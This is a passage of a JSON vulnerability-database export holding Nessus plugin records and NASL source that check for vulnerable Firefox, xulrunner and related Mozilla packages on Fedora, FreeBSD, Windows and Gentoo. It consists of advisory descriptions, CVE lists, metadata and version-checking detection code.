reference:\"perl-Gtk2-MozEmbed-0.08-6.fc11.3\")) flag++;\nif (rpm_check(release:\"FC11\", reference:\"ruby-gnome2-0.19.0-3.fc11.1\")) flag++;\nif (rpm_check(release:\"FC11\", reference:\"xulrunner-1.9.1.1-1.fc11\")) flag++;\nif (rpm_check(release:\"FC11\", reference:\"yelp-2.26.0-5.fc11\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Miro / blam / chmsee / eclipse / epiphany / epiphany-extensions / etc\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:49:43", "description": "Mozilla Project reports :\n\nFirefox user zbyte reported a crash that we determined could result in\nan exploitable memory corruption problem. In certain cases after a\nreturn from a native function, such as escape(), the Just-in-Time\n(JIT) compiler could get into a corrupt state. This could be exploited\nby an attacker to run arbitrary code such as installing malware.\n\nThis vulnerability does not affect earlier versions of Firefox which\ndo not support the JIT feature.", "edition": 27, "published": "2009-07-20T00:00:00", "title": "FreeBSD : mozilla -- corrupt JIT state after deep return from native function (c1ef9b33-72a6-11de-82ea-0030843d3802)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2477"], "modified": "2009-07-20T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:firefox"], "id": "FREEBSD_PKG_C1EF9B3372A611DE82EA0030843D3802.NASL", "href": "https://www.tenable.com/plugins/nessus/39867", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(39867);\n script_version(\"1.26\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2009-2477\");\n script_xref(name:\"CERT\", value:\"443060\");\n\n script_name(english:\"FreeBSD : mozilla -- corrupt JIT state after deep return from native function (c1ef9b33-72a6-11de-82ea-0030843d3802)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Mozilla Project reports :\n\nFirefox user zbyte reported a crash that we determined could result in\nan exploitable memory corruption problem. In certain cases after a\nreturn from a native function, such as escape(), the Just-in-Time\n(JIT) compiler could get into a corrupt state. This could be exploited\nby an attacker to run arbitrary code such as installing malware.\n\nThis vulnerability does not affect earlier versions of Firefox which\ndo not support the JIT feature.\"\n );\n # http://www.mozilla.org/security/announce/2009/mfsa2009-41.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2009-41/\"\n );\n # https://vuxml.freebsd.org/freebsd/c1ef9b33-72a6-11de-82ea-0030843d3802.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8f8822c7\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Firefox 3.5 escape() Return Value Memory Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(94);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/07/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/07/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"firefox>=3.5.*,1<3.5.1,1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-01T04:07:46", "description": "Firefox 3.5 is installed on the remote host. This version is\npotentially affected by multiple flaws :\n\n - It may be possible to crash the browser or potentially\n execute arbitrary code by using a flash object that\n presents a slow script dialog. (MFSA 2009-35)\n\n - In certain cases after a return from a native function,\n such as escape(), the Just-in-Time (JIT) compiler could\n get into a corrupt state. An attacker who is able to\n trick a user of the affected software into visiting a\n malicious link may be able to leverage this issue to\n run arbitrary code subject to the user's privileges.\n (MFSA 2009-41)", "edition": 30, "published": "2009-07-17T00:00:00", "title": "Firefox 3.5.x < 3.5.1 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2477", "CVE-2009-2467"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/a:mozilla:firefox"], "id": "MOZILLA_FIREFOX_351.NASL", "href": "https://www.tenable.com/plugins/nessus/39853", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(39853);\n script_version(\"1.20\");\n\n script_cve_id(\"CVE-2009-2467\", \"CVE-2009-2477\");\n script_bugtraq_id(35660,35767);\n\n script_name(english:\"Firefox 3.5.x < 3.5.1 Multiple Vulnerabilities\");\n script_summary(english:\"Checks version of Firefox\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host contains a web browser that is \naffected by multiple flaws.\" );\n\n script_set_attribute(attribute:\"description\", value:\n\"Firefox 3.5 is installed on the remote host. This version is\npotentially affected by multiple flaws :\n\n - It may be possible to crash the browser or potentially\n execute arbitrary code by using a flash object that\n presents a slow script dialog. (MFSA 2009-35)\n\n - In certain cases after a return from a native function,\n such as escape(), the Just-in-Time (JIT) compiler could\n get into a corrupt state. An attacker who is able to\n trick a user of the affected software into visiting a\n malicious link may be able to leverage this issue to\n run arbitrary code subject to the user's privileges.\n (MFSA 2009-41)\");\n\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2009-35/\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2009-41/\" );\n script_set_attribute(attribute:\"solution\", value: \"Upgrade to Firefox 3.5.1 or later.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Firefox 3.5 escape() Return Value Memory Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(94);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/07/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/07/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/17\");\n\n script_cvs_date(\"Date: 2018/07/16 14:09:14\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mozilla:firefox\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n script_copyright(english:\"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.\");\n script_dependencies(\"mozilla_org_installed.nasl\");\n script_require_keys(\"Mozilla/Firefox/Version\");\n exit(0);\n}\n\ninclude(\"mozilla_version.inc\");\nport = get_kb_item_or_exit(\"SMB/transport\"); \n\ninstalls = get_kb_list(\"SMB/Mozilla/Firefox/*\");\nif (isnull(installs)) audit(AUDIT_NOT_INST, \"Firefox\");\n\nmozilla_check_version(installs:installs, product:'firefox', esr:FALSE, fix:'3.5.1', min:'3.5', severity:SECURITY_HOLE);", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:54:31", "description": "The remote host is affected by the vulnerability described in GLSA-201301-01\n(Mozilla Products: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Mozilla Firefox,\n Thunderbird, SeaMonkey, NSS, GNU IceCat, and XULRunner. Please review the\n CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could entice a user to view a specially crafted web\n page or email, possibly resulting in execution of arbitrary code or a\n Denial of Service condition. Furthermore, a remote attacker may be able\n to perform Man-in-the-Middle attacks, obtain sensitive information,\n bypass restrictions and protection mechanisms, force file downloads,\n conduct XML injection attacks, conduct XSS attacks, bypass the Same\n Origin Policy, spoof URL’s for phishing attacks, trigger a vertical\n scroll, spoof the location bar, spoof an SSL indicator, modify the\n browser’s font, conduct clickjacking attacks, or have other unspecified\n impact.\n A local attacker could gain escalated privileges, obtain sensitive\n information, or replace an arbitrary downloaded file.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 26, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2013-01-08T00:00:00", "title": "GLSA-201301-01 : Mozilla Products: Multiple vulnerabilities (BEAST)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-1945", "CVE-2011-3648", "CVE-2009-0355", "CVE-2011-0061", "CVE-2011-0077", "CVE-2012-0478", "CVE-2012-4193", "CVE-2011-1202", "CVE-2012-0442", "CVE-2010-3772", "CVE-2011-0071", "CVE-2009-2470", "CVE-2010-0654", "CVE-2009-3388", "CVE-2012-1962", "CVE-2012-0443", "CVE-2011-3866", "CVE-2011-0068", "CVE-2012-5842", "CVE-2012-4212", "CVE-2009-2477", "CVE-2010-0176", "CVE-2011-3640", "CVE-2011-0083", "CVE-2010-1203", "CVE-2009-3076", "CVE-2012-1970", "CVE-2009-3389", "CVE-2008-3835", "CVE-2012-3989", "CVE-2010-2762", "CVE-2012-5830", "CVE-2012-4210", "CVE-2009-1305", "CVE-2011-3026", "CVE-2009-3979", "CVE-2011-2370", "CVE-2012-0460", "CVE-2012-1973", "CVE-2009-3376", "CVE-2011-2369", "CVE-2011-2998", "CVE-2011-3654", "CVE-2011-2605", "CVE-2009-1833", "CVE-2010-0165", "CVE-2012-1974", "CVE-2010-0220", "CVE-2010-2766", "CVE-2011-2993", "CVE-2012-4195", "CVE-2010-0168", "CVE-2012-3986", "CVE-2010-0160", "CVE-2009-1169", "CVE-2011-2371", "CVE-2009-3379", "CVE-2012-4185", "CVE-2010-3777", "CVE-2012-3991", "CVE-2012-5354", "CVE-2012-4206", "CVE-2009-3071", "CVE-2012-3968", "CVE-2010-1214", "CVE-2012-3963", "CVE-2010-0174", "CVE-2010-0172", "CVE-2009-2535", "CVE-2012-0452", "CVE-2009-1312", "CVE-2012-1956", "CVE-2012-3978", "CVE-2012-3985", "CVE-2011-2995", "CVE-2012-5829", "CVE-2009-1571", "CVE-2008-5505", "CVE-2012-5838", "CVE-2011-2986", "CVE-2010-1205", "CVE-2009-2210", "CVE-2009-2478", "CVE-2008-6961", "CVE-2012-0479", "CVE-2012-0450", "CVE-2012-1940", "CVE-2012-3993", "CVE-2008-5500", "CVE-2012-5836", "CVE-2009-3274", "CVE-2010-1125", "CVE-2009-0772", "CVE-2012-3995", "CVE-2012-4201", "CVE-2010-0159", "CVE-2009-0773", "CVE-2011-3659", "CVE-2011-3663", "CVE-2010-3131", "CVE-2012-0470", "CVE-2012-0446", "CVE-2008-4063", "CVE-2012-3976", "CVE-2012-1972", "CVE-2010-1200", "CVE-2010-0175", "CVE-2010-0170", "CVE-2012-3988", "CVE-2012-0457", "CVE-2010-3778", "CVE-2012-3994", "CVE-2012-3962", "CVE-2010-2770", "CVE-2010-3774", "CVE-2012-0459", "CVE-2011-2362", "CVE-2009-1304", "CVE-2010-1213", "CVE-2010-3177", "CVE-2012-5843", "CVE-2009-1835", "CVE-2011-0085", "CVE-2009-0352", "CVE-2009-3984", "CVE-2009-3380", "CVE-2008-5510", "CVE-2011-0080", "CVE-2012-1950", "CVE-2008-5502", "CVE-2009-3981", "CVE-2010-3765", "CVE-2010-0167", "CVE-2009-3373", "CVE-2009-3980", "CVE-2008-4070", "CVE-2012-4183", "CVE-2010-3178", "CVE-2012-1994", "CVE-2011-3661", "CVE-2009-3383", "CVE-2012-4181", "CVE-2011-3652", "CVE-2009-1311", "CVE-2011-1712", "CVE-2008-4067", "CVE-2010-1210", "CVE-2011-2364", "CVE-2009-2469", "CVE-2011-0073", "CVE-2010-1197", "CVE-2010-1207", "CVE-2009-0652", "CVE-2012-4186", "CVE-2012-1948", "CVE-2008-5012", "CVE-2011-2982", "CVE-2012-1938", "CVE-2012-0449", "CVE-2010-3769", "CVE-2012-3969", "CVE-2009-1838", "CVE-2012-1953", "CVE-2008-5013", "CVE-2012-1949", "CVE-2012-0456", "CVE-2011-2372", "CVE-2010-3773", "CVE-2009-1309", "CVE-2011-0079", "CVE-2010-3169", "CVE-2009-2662", "CVE-2012-3970", "CVE-2011-2997", "CVE-2011-0053", "CVE-2009-1832", "CVE-2012-5840", "CVE-2010-3176", "CVE-2012-4191", "CVE-2010-3174", "CVE-2012-1966", "CVE-2010-3768", "CVE-2009-3372", "CVE-2010-2763", "CVE-2011-0066", "CVE-2010-1212", "CVE-2009-1837", "CVE-2010-1206", "CVE-2010-1211", "CVE-2009-2464", "CVE-2011-2990", "CVE-2010-1121", "CVE-2009-0356", "CVE-2011-3389", "CVE-2010-0164", "CVE-2008-3836", "CVE-2010-3167", "CVE-2012-4930", "CVE-2012-4202", "CVE-2007-2671", "CVE-2011-2984", "CVE-2010-3180", "CVE-2012-3957", "CVE-2011-3660", "CVE-2009-3986", "CVE-2012-1941", "CVE-2009-2408", "CVE-2010-3399", "CVE-2009-2665", "CVE-2008-4066", "CVE-2008-5018", "CVE-2009-3978", "CVE-2012-3984", "CVE-2009-0354", "CVE-2009-3079", "CVE-2011-0056", "CVE-2012-0444", "CVE-2011-3650", "CVE-2010-2753", "CVE-2012-1946", "CVE-2010-3776", "CVE-2010-1215", "CVE-2012-4182", "CVE-2011-2980", "CVE-2012-4187", "CVE-2008-4069", "CVE-2010-0166", "CVE-2011-3647", "CVE-2011-0065", "CVE-2011-0062", "CVE-2008-0016", "CVE-2009-0358", "CVE-2011-3101", "CVE-2010-3168", "CVE-2010-0173", "CVE-2009-1044", "CVE-2008-5513", "CVE-2008-4059", "CVE-2010-2764", "CVE-2011-0081", "CVE-2009-0771", "CVE-2009-1392", "CVE-2008-5504", "CVE-2008-5019", "CVE-2012-1954", "CVE-2009-0774", "CVE-2009-3375", "CVE-2012-0461", "CVE-2011-2376", "CVE-2009-2472", "CVE-2012-3958", "CVE-2009-0071", "CVE-2008-5023", "CVE-2012-0469", "CVE-2010-3171", "CVE-2009-3072", "CVE-2012-3973", "CVE-2008-5822", "CVE-2012-1975", "CVE-2011-0075", "CVE-2012-0464", "CVE-2012-1967", "CVE-2011-3653", "CVE-2010-0648", "CVE-2010-0178", "CVE-2010-3166", "CVE-2010-0177", "CVE-2011-0074", "CVE-2012-3956", "CVE-2010-2769", "CVE-2011-3649", "CVE-2012-3982", "CVE-2009-3555", "CVE-2011-2989", "CVE-2010-1196", "CVE-2008-3837", "CVE-2009-0357", "CVE-2008-5021", "CVE-2008-5017", "CVE-2012-3966", "CVE-2012-5839", "CVE-2011-2378", "CVE-2009-1308", "CVE-2010-3775", "CVE-2009-2467", "CVE-2012-1961", "CVE-2010-5074", "CVE-2011-2996", "CVE-2010-3173", "CVE-2012-4216", "CVE-2008-4062", "CVE-2010-3179", "CVE-2010-0182", "CVE-2012-3967", "CVE-2011-3651", "CVE-2008-4060", "CVE-2009-0689", "CVE-2010-0181", "CVE-2012-1951", "CVE-2012-0475", "CVE-2012-3965", "CVE-2012-1952", "CVE-2010-1201", "CVE-2011-4688", "CVE-2009-1306", "CVE-2010-1585", "CVE-2009-2479", "CVE-2012-3959", "CVE-2012-0455", "CVE-2009-0777", "CVE-2010-2755", "CVE-2011-0084", "CVE-2011-0051", "CVE-2010-3767", "CVE-2012-1939", "CVE-2009-1834", "CVE-2010-3771", "CVE-2010-0183", "CVE-2012-0474", "CVE-2012-3975", "CVE-2010-2768", "CVE-2008-5014", "CVE-2008-0367", "CVE-2008-4058", "CVE-2011-3002", "CVE-2012-4184", "CVE-2011-0057", "CVE-2012-0447", "CVE-2011-3232", "CVE-2008-5913", "CVE-2007-3073", "CVE-2012-4205", "CVE-2010-2751", "CVE-2009-1836", "CVE-2011-0069", "CVE-2008-5022", "CVE-2008-5512", "CVE-2012-3992", "CVE-2009-3374", "CVE-2008-5501", "CVE-2008-4068", "CVE-2008-5016", "CVE-2011-3004", "CVE-2012-3980", "CVE-2008-5503", "CVE-2011-2374", "CVE-2012-1955", "CVE-2009-1839", "CVE-2012-1960", "CVE-2012-0445", "CVE-2009-3074", "CVE-2012-1965", "CVE-2011-3670", "CVE-2012-0462", "CVE-2010-1028", "CVE-2010-0162", "CVE-2011-2377", "CVE-2009-2463", "CVE-2009-2061", "CVE-2009-3070", "CVE-2011-3000", "CVE-2010-2765", "CVE-2009-3069", "CVE-2010-0171", "CVE-2010-2767", "CVE-2009-0353", "CVE-2011-0078", "CVE-2012-3960", "CVE-2010-3175", "CVE-2009-0775", "CVE-2012-0451", "CVE-2011-3655", "CVE-2012-4180", "CVE-2009-2044", "CVE-2010-3182", "CVE-2009-0776", "CVE-2009-3371", "CVE-2009-3377", "CVE-2012-1959", "CVE-2007-1861", "CVE-2011-2363", "CVE-2009-3075", "CVE-2010-0163", "CVE-2010-1208", "CVE-2011-0070", "CVE-2012-1947", "CVE-2009-1841", "CVE-2010-3170", "CVE-2011-3005", "CVE-2011-0059", "CVE-2012-1971", "CVE-2009-3983", "CVE-2012-4208", "CVE-2009-3987", "CVE-2011-3658", "CVE-2011-2373", "CVE-2008-5511", "CVE-2012-1957", "CVE-2012-1958", "CVE-2011-0054", "CVE-2012-4190", "CVE-2008-4064", "CVE-2012-1976", "CVE-2011-1187", "CVE-2012-5835", "CVE-2010-3183", "CVE-2009-2654", "CVE-2010-1202", "CVE-2012-0468", "CVE-2009-3982", "CVE-2009-3985", "CVE-2009-2065", "CVE-2009-1313", "CVE-2009-3382", "CVE-2008-5508", "CVE-2012-3972", "CVE-2012-4207", "CVE-2011-2988", "CVE-2010-3770", "CVE-2008-4061", "CVE-2010-1199", "CVE-2012-4204", "CVE-2008-0017", "CVE-2009-3988", "CVE-2010-3400", "CVE-2009-1302", "CVE-2011-2985", "CVE-2009-2466", "CVE-2012-4192", "CVE-2011-0058", "CVE-2011-2987", "CVE-2012-4188", "CVE-2012-0441", "CVE-2008-5024", "CVE-2011-0076", "CVE-2007-2437", "CVE-2012-5833", "CVE-2011-2999", "CVE-2012-3964", "CVE-2012-5841", "CVE-2010-0179", "CVE-2010-1209", "CVE-2010-2754", "CVE-2008-5507", "CVE-2009-2471", "CVE-2012-3990", "CVE-2011-2375", "CVE-2010-1198", "CVE-2008-4065", "CVE-2009-1840", "CVE-2011-3665", "CVE-2009-3381", "CVE-2011-0067", "CVE-2010-2760", "CVE-2012-1937", "CVE-2012-4215", "CVE-2009-2043", "CVE-2009-1307", "CVE-2009-2664", "CVE-2012-0463", "CVE-2010-4508", "CVE-2009-1310", "CVE-2009-3077", "CVE-2011-3003", "CVE-2011-2991", "CVE-2008-5015", "CVE-2011-0082", "CVE-2011-2983", "CVE-2012-4179", "CVE-2008-4582", "CVE-2011-3001", "CVE-2012-1964", "CVE-2009-2462", "CVE-2009-3378", "CVE-2011-3062", "CVE-2009-1303", "CVE-2012-0477", "CVE-2012-0473", "CVE-2012-4194", "CVE-2011-2365", "CVE-2012-4209", "CVE-2012-1963", "CVE-2012-4196", "CVE-2008-5506", "CVE-2009-2404", "CVE-2009-2465", "CVE-2012-0467", "CVE-2011-2981", "CVE-2012-0458", "CVE-2010-0169", "CVE-2010-2752", "CVE-2009-3078", "CVE-2012-0471", "CVE-2012-3961", "CVE-2010-3766", "CVE-2012-3971", "CVE-2008-5052", "CVE-2011-0055", "CVE-2009-1828", "CVE-2011-0072"], "modified": "2013-01-08T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:seamonkey-bin", "p-cpe:/a:gentoo:linux:firefox", "p-cpe:/a:gentoo:linux:mozilla-firefox-bin", "p-cpe:/a:gentoo:linux:thunderbird", "cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:mozilla-thunderbird-bin", "p-cpe:/a:gentoo:linux:seamonkey", "p-cpe:/a:gentoo:linux:icecat", "p-cpe:/a:gentoo:linux:mozilla-firefox", "p-cpe:/a:gentoo:linux:nss", "p-cpe:/a:gentoo:linux:xulrunner", "p-cpe:/a:gentoo:linux:thunderbird-bin", "p-cpe:/a:gentoo:linux:xulrunner-bin", "p-cpe:/a:gentoo:linux:firefox-bin", "p-cpe:/a:gentoo:linux:mozilla-thunderbird"], "id": "GENTOO_GLSA-201301-01.NASL", "href": "https://www.tenable.com/plugins/nessus/63402", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201301-01.\n#\n# The advisory text is Copyright (C) 2001-2020 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(63402);\n script_version(\"1.31\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2007-1861\", \"CVE-2007-2437\", \"CVE-2007-2671\", \"CVE-2007-3073\", \"CVE-2008-0016\", \"CVE-2008-0017\", \"CVE-2008-0367\", \"CVE-2008-3835\", \"CVE-2008-3836\", \"CVE-2008-3837\", \"CVE-2008-4058\", \"CVE-2008-4059\", \"CVE-2008-4060\", \"CVE-2008-4061\", \"CVE-2008-4062\", \"CVE-2008-4063\", \"CVE-2008-4064\", \"CVE-2008-4065\", \"CVE-2008-4066\", \"CVE-2008-4067\", \"CVE-2008-4068\", \"CVE-2008-4069\", \"CVE-2008-4070\", \"CVE-2008-4582\", \"CVE-2008-5012\", \"CVE-2008-5013\", \"CVE-2008-5014\", \"CVE-2008-5015\", \"CVE-2008-5016\", \"CVE-2008-5017\", \"CVE-2008-5018\", \"CVE-2008-5019\", \"CVE-2008-5021\", \"CVE-2008-5022\", \"CVE-2008-5023\", \"CVE-2008-5024\", \"CVE-2008-5052\", \"CVE-2008-5500\", \"CVE-2008-5501\", \"CVE-2008-5502\", \"CVE-2008-5503\", \"CVE-2008-5504\", \"CVE-2008-5505\", \"CVE-2008-5506\", \"CVE-2008-5507\", \"CVE-2008-5508\", \"CVE-2008-5510\", \"CVE-2008-5511\", \"CVE-2008-5512\", \"CVE-2008-5513\", \"CVE-2008-5822\", \"CVE-2008-5913\", \"CVE-2008-6961\", \"CVE-2009-0071\", \"CVE-2009-0352\", \"CVE-2009-0353\", \"CVE-2009-0354\", \"CVE-2009-0355\", \"CVE-2009-0356\", \"CVE-2009-0357\", \"CVE-2009-0358\", \"CVE-2009-0652\", \"CVE-2009-0689\", \"CVE-2009-0771\", \"CVE-2009-0772\", \"CVE-2009-0773\", \"CVE-2009-0774\", \"CVE-2009-0775\", \"CVE-2009-0776\", \"CVE-2009-0777\", \"CVE-2009-1044\", \"CVE-2009-1169\", \"CVE-2009-1302\", \"CVE-2009-1303\", \"CVE-2009-1304\", \"CVE-2009-1305\", \"CVE-2009-1306\", \"CVE-2009-1307\", \"CVE-2009-1308\", \"CVE-2009-1309\", \"CVE-2009-1310\", \"CVE-2009-1311\", \"CVE-2009-1312\", \"CVE-2009-1313\", \"CVE-2009-1392\", \"CVE-2009-1571\", \"CVE-2009-1828\", \"CVE-2009-1832\", \"CVE-2009-1833\", \"CVE-2009-1834\", \"CVE-2009-1835\", \"CVE-2009-1836\", \"CVE-2009-1837\", \"CVE-2009-1838\", \"CVE-2009-1839\", \"CVE-2009-1840\", \"CVE-2009-1841\", \"CVE-2009-2043\", \"CVE-2009-2044\", \"CVE-2009-2061\", \"CVE-2009-2065\", \"CVE-2009-2210\", \"CVE-2009-2404\", \"CVE-2009-2408\", \"CVE-2009-2462\", \"CVE-2009-2463\", \"CVE-2009-2464\", \"CVE-2009-2465\", \"CVE-2009-2466\", \"CVE-2009-2467\", \"CVE-2009-2469\", \"CVE-2009-2470\", \"CVE-2009-2471\", \"CVE-2009-2472\", \"CVE-2009-2477\", \"CVE-2009-2478\", \"CVE-2009-2479\", \"CVE-2009-2535\", \"CVE-2009-2654\", \"CVE-2009-2662\", \"CVE-2009-2664\", \"CVE-2009-2665\", \"CVE-2009-3069\", \"CVE-2009-3070\", \"CVE-2009-3071\", \"CVE-2009-3072\", \"CVE-2009-3074\", \"CVE-2009-3075\", \"CVE-2009-3076\", \"CVE-2009-3077\", \"CVE-2009-3078\", \"CVE-2009-3079\", \"CVE-2009-3274\", \"CVE-2009-3371\", \"CVE-2009-3372\", \"CVE-2009-3373\", \"CVE-2009-3374\", \"CVE-2009-3375\", \"CVE-2009-3376\", \"CVE-2009-3377\", \"CVE-2009-3378\", \"CVE-2009-3379\", \"CVE-2009-3380\", \"CVE-2009-3381\", \"CVE-2009-3382\", \"CVE-2009-3383\", \"CVE-2009-3388\", \"CVE-2009-3389\", \"CVE-2009-3555\", \"CVE-2009-3978\", \"CVE-2009-3979\", \"CVE-2009-3980\", \"CVE-2009-3981\", \"CVE-2009-3982\", \"CVE-2009-3983\", \"CVE-2009-3984\", \"CVE-2009-3985\", \"CVE-2009-3986\", \"CVE-2009-3987\", \"CVE-2009-3988\", \"CVE-2010-0159\", \"CVE-2010-0160\", \"CVE-2010-0162\", \"CVE-2010-0163\", \"CVE-2010-0164\", \"CVE-2010-0165\", \"CVE-2010-0166\", \"CVE-2010-0167\", 